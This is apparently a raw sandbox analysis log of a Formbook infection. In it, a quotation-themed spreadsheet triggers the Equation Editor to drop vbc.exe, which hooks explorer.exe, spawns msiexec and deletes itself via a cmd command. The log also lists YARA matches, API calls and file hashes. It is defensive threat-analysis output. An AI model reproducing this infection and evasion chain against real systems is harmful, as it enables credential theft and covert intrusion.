Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\Public\vbc.exe	Code function: 4_2_01007C03	4_2_01007C03
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0100502D	4_2_0100502D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00420098	4_2_00420098
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004201A0	4_2_004201A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00425448	4_2_00425448
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00425508	4_2_00425508
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042B5A0	4_2_0042B5A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004255B8	4_2_004255B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042AFD0	4_2_0042AFD0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00427018	4_2_00427018
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004204E1	4_2_004204E1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00428799	4_2_00428799
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00425891	4_2_00425891
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042D9C8	4_2_0042D9C8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042D9B9	4_2_0042D9B9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00420A19	4_2_00420A19
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042AFC1	4_2_0042AFC1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00FA0048	4_2_00FA0048
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00FA0047	4_2_00FA0047
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00FA419A	4_2_00FA419A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00FA56FD	4_2_00FA56FD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01008831	4_2_01008831
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041E993	5_2_0041E993
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D8A	5_2_00402D8A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00409E30	5_2_00409E30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041DFD0	5_2_0041DFD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0100502D	5_2_0100502D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_01007C03	5_2_01007C03
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A4E0C6	5_2_00A4E0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A7D005	5_2_00A7D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A53040	5_2_00A53040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A6905A	5_2_00A6905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A4E2E9	5_2_00A4E2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AF1238	5_2_00AF1238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A4F3CF	5_2_00A4F3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A763DB	5_2_00A763DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A52305	5_2_00A52305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A9A37B	5_2_00A9A37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A57353	5_2_00A57353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A85485	5_2_00A85485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A61489	5_2_00A61489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A6C5F0	5_2_00A6C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A5351F	5_2_00A5351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A54680	5_2_00A54680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A5E6C1	5_2_00A5E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AF2622	5_2_00AF2622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A5C7BC	5_2_00A5C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AD579A	5_2_00AD579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A857C3	5_2_00A857C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AEF8EE	5_2_00AEF8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A7286D	5_2_00A7286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A5C85C	5_2_00A5C85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A529B2	5_2_00A529B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AF098E	5_2_00AF098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_01008831	5_2_01008831
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027C1238	8_2_027C1238
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0271E2E9	8_2_0271E2E9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0276A37B	8_2_0276A37B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02727353	8_2_02727353
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02722305	8_2_02722305
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027463DB	8_2_027463DB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0271F3CF	8_2_0271F3CF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0273905A	8_2_0273905A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02723040	8_2_02723040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0274D005	8_2_0274D005
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0271E0C6	8_2_0271E0C6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027C2622	8_2_027C2622
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0272E6C1	8_2_0272E6C1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02724680	8_2_02724680
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027557C3	8_2_027557C3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0272C7BC	8_2_0272C7BC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027A579A	8_2_027A579A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02755485	8_2_02755485
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02731489	8_2_02731489
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0272351F	8_2_0272351F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0273C5F0	8_2_0273C5F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027D3A83	8_2_027D3A83
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02747B00	8_2_02747B00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027ADBDA	8_2_027ADBDA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0271FBD7	8_2_0271FBD7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027CCBA4	8_2_027CCBA4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0274286D	8_2_0274286D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0272C85C	8_2_0272C85C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027BF8EE	8_2_027BF8EE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027A5955	8_2_027A5955
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027369FE	8_2_027369FE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027229B2	8_2_027229B2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027C098E	8_2_027C098E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0273EE4C	8_2_0273EE4C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02752E2F	8_2_02752E2F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0274DF7C	8_2_0274DF7C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02730F3F	8_2_02730F3F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0272CD5B	8_2_0272CD5B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02750D3B	8_2_02750D3B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027BFDDD	8_2_027BFDDD

Source: C:\Users\Public\vbc.exe	Code function: String function: 00A4DF5C appears 67 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A9373B appears 144 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A93F92 appears 60 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00ABF970 appears 48 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 0271E2A8 appears 38 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 0276373B appears 238 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 02763F92 appears 108 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 0271DF5C appears 106 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 0278F970 appears 81 times

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419D50 NtCreateFile,	5_2_00419D50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419E00 NtReadFile,	5_2_00419E00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419E80 NtClose,	5_2_00419E80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419F30 NtAllocateVirtualMemory,	5_2_00419F30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419D4A NtCreateFile,	5_2_00419D4A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419E7C NtClose,	5_2_00419E7C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419F2A NtAllocateVirtualMemory,	5_2_00419F2A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A400C4 NtCreateFile,LdrInitializeThunk,	5_2_00A400C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A40078 NtResumeThread,LdrInitializeThunk,	5_2_00A40078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00A40048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3F9F0 NtClose,LdrInitializeThunk,	5_2_00A3F9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3F900 NtReadFile,LdrInitializeThunk,	5_2_00A3F900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_00A3FAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_00A3FAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_00A3FBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_00A3FB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_00A3FC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_00A3FC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,	5_2_00A3FD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_00A3FDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_00A3FEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_00A3FED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,	5_2_00A3FFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A410D0 NtOpenProcessToken,	5_2_00A410D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A40060 NtQuerySection,	5_2_00A40060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A401D4 NtSetValueKey,	5_2_00A401D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A4010C NtOpenDirectoryObject,	5_2_00A4010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A41148 NtOpenThread,	5_2_00A41148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A407AC NtCreateMutant,	5_2_00A407AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3F8CC NtWaitForSingleObject,	5_2_00A3F8CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027100C4 NtCreateFile,LdrInitializeThunk,	8_2_027100C4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027107AC NtCreateMutant,LdrInitializeThunk,	8_2_027107AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FAE8 NtQueryInformationProcess,LdrInitializeThunk,	8_2_0270FAE8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FB68 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_0270FB68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FB50 NtCreateKey,LdrInitializeThunk,	8_2_0270FB50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FBB8 NtQueryInformationToken,LdrInitializeThunk,	8_2_0270FBB8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270F900 NtReadFile,LdrInitializeThunk,	8_2_0270F900
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270F9F0 NtClose,LdrInitializeThunk,	8_2_0270F9F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_0270FED0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FFB4 NtCreateSection,LdrInitializeThunk,	8_2_0270FFB4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FC60 NtMapViewOfSection,LdrInitializeThunk,	8_2_0270FC60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FDC0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_0270FDC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FD8C NtDelayExecution,LdrInitializeThunk,	8_2_0270FD8C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02710078 NtResumeThread,	8_2_02710078
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02710060 NtQuerySection,	8_2_02710060
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02710048 NtProtectVirtualMemory,	8_2_02710048
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027110D0 NtOpenProcessToken,	8_2_027110D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02711148 NtOpenThread,	8_2_02711148
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0271010C NtOpenDirectoryObject,	8_2_0271010C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027101D4 NtSetValueKey,	8_2_027101D4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FA50 NtEnumerateValueKey,	8_2_0270FA50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FA20 NtQueryInformationFile,	8_2_0270FA20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FAD0 NtAllocateVirtualMemory,	8_2_0270FAD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FAB8 NtQueryValueKey,	8_2_0270FAB8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FBE8 NtQueryVirtualMemory,	8_2_0270FBE8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270F8CC NtWaitForSingleObject,	8_2_0270F8CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02711930 NtSetContextThread,	8_2_02711930
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270F938 NtWriteFile,	8_2_0270F938
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FE24 NtWriteVirtualMemory,	8_2_0270FE24
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FEA0 NtReadVirtualMemory,	8_2_0270FEA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FF34 NtQueueApcThread,	8_2_0270FF34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FFFC NtCreateProcessEx,	8_2_0270FFFC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02710C40 NtGetContextThread,	8_2_02710C40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FC48 NtSetInformationFile,	8_2_0270FC48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FC30 NtOpenProcess,	8_2_0270FC30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FC90 NtUnmapViewOfSection,	8_2_0270FC90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0270FD5C NtEnumerateKey,	8_2_0270FD5C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02711D80 NtSuspendThread,	8_2_02711D80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_000A9D50 NtCreateFile,	8_2_000A9D50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_000A9E00 NtReadFile,	8_2_000A9E00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_000A9E80 NtClose,	8_2_000A9E80

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe 2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
Source: Joe Sandbox View	Dropped File: C:\Users\Public\vbc.exe 2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: rundll32[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: (QUOTATION)B-RUS-20061REV2.xlsx

ReversingLabs: Detection: 28%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$(QUOTATION)B-RUS-20061REV2.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD74B.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@10/10@2/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.507251158.00000000007CA000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, msiexec.exe

Source: C:\Users\Public\vbc.exe	Code function: 4_2_01007C03 push es; ret	4_2_01007F96
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00FA5CE0 push 8A4000C4h; ret	4_2_00FA5CEE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00FA5C89 push 8A3400C4h; ret	4_2_00FA5C96
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00FA5C30 push 898C00C4h; ret	4_2_00FA5C3E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00FA3BB0 push es; iretd	4_2_00FA3BB1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004178AB pushfd ; ret	5_2_004178AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040E27F push edx; iretd	5_2_0040E280
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00409BD5 push esp; iretd	5_2_00409BDC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004175F8 push edx; iretd	5_2_00417628
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419DA2 pushad ; retf	5_2_00419DAB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041660F push edx; iretd	5_2_00416610
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CEF2 push eax; ret	5_2_0041CEF8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CEFB push eax; ret	5_2_0041CF62
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CEA5 push eax; ret	5_2_0041CEF8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CF5C push eax; ret	5_2_0041CF62
Source: C:\Users\Public\vbc.exe	Code function: 5_2_01007C03 push es; ret	5_2_01007F96
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0271DFA1 push ecx; ret	8_2_0271DFB4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0009E27F push edx; iretd	8_2_0009E280

Source: initial sample	Static PE information: section name: .text entropy: 7.61448564553
Source: initial sample	Static PE information: section name: .text entropy: 7.61448564553

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xEB

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
